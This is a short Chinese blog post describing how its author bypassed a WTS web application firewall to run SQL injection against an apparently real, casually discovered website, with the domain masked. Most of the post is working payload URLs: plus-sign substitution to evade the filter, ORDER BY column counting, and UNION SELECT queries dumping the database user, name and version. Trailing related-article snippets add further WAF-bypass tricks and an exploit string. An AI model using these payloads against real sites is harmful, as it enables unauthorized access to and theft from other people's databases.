绕过WTS-WAF进行sql注入

作者: migrate_ | 来源:发表于2019-05-07 09:16 被阅读0次

绕过WTS-WAF进行sql注入
小迪16期-20170408
绕过waf进行SQL注入
BUUCTF-Web-随便注(三种解题思路)
绕过waf
sql注入那些事儿——如何优雅地进行SQL注入(3)
sql注入那些事儿——如何优雅地进行SQL注入(4)
sql注入之盲注
sql注入之outfile
sql注入绕过方法

偶然看到一个网站存在sql注入，但是有waf，随手测试就绕过了，很简单的绕过姿势。(全程打马)

http://www.ooxx.com/news_blank.php?id=297 and 1=1

1.jpg

很明显语句被拦截了

http://www.ooxx.com/news_blank.php?id=297+and+1=1

2.jpg

http://www.ooxx.com/news_blank.php?id=297+and+1=2

3.jpg

判断出此处确定存在sql注入，接下来就是猜解列数 order by
利用二分法 order by 11正常，order by 12错误，存在11个字段

4.jpg

5.jpg

然后进行联合查询

http://www.ooxx.com/news_blank.php?id=297+and+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11

6.jpg

箭头指向的就是爆出的显示位

http://www.ooxx.com/news_blank.php?id=297+and+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),9,10,11

7.jpg

成功爆出数据库，接下来爆表，爆列，字段。。。。。

8.jpg

绕过WTS-WAF进行sql注入
偶然看到一个网站存在sql注入，但是有waf，随手测试就绕过了，很简单的绕过姿势。(全程打马) 很明显语句被拦截了...
小迪16期-20170408
安全狗防护注入及绕过思路Sqlmap tamper插件分析. sql注入绕过思路一：提交方式更改注入sql注入绕过...
绕过waf进行SQL注入
转自：https://security.tencent.com/index.php/blog/msg/66 waf...
BUUCTF-Web-随便注(三种解题思路)
知识点：SQL注入-堆叠注入,sql预处理语句,巧用contact()函数绕过堆叠注入原理: 在SQL中，分号（...
绕过waf
绕过云锁进行SQL注入 EXP： 1.php?id=-1 union(select 1,2,3,@@datadir...
sql注入那些事儿——如何优雅地进行SQL注入(3)
传送门： sql注入那些事儿——如何优雅地进行SQL注入(1)sql注入那些事儿——如何优雅地进行SQL注入(2)...
sql注入那些事儿——如何优雅地进行SQL注入(4)
传送门： sql注入那些事儿——如何优雅地进行SQL注入(1)sql注入那些事儿——如何优雅地进行SQL注入(2)...
sql注入之盲注
传送门： sql注入那些事儿——如何优雅地进行SQL注入(1) sql注入那些事儿——如何优雅地进行SQL注入(2...
sql注入之outfile
传送门： sql注入那些事儿——如何优雅地进行SQL注入(1) sql注入那些事儿——如何优雅地进行SQL注入(2...
sql注入绕过方法
大小写变形：or — Or、oR等价替换：and — &&、or — ||、 xor — |、 not — ！双写...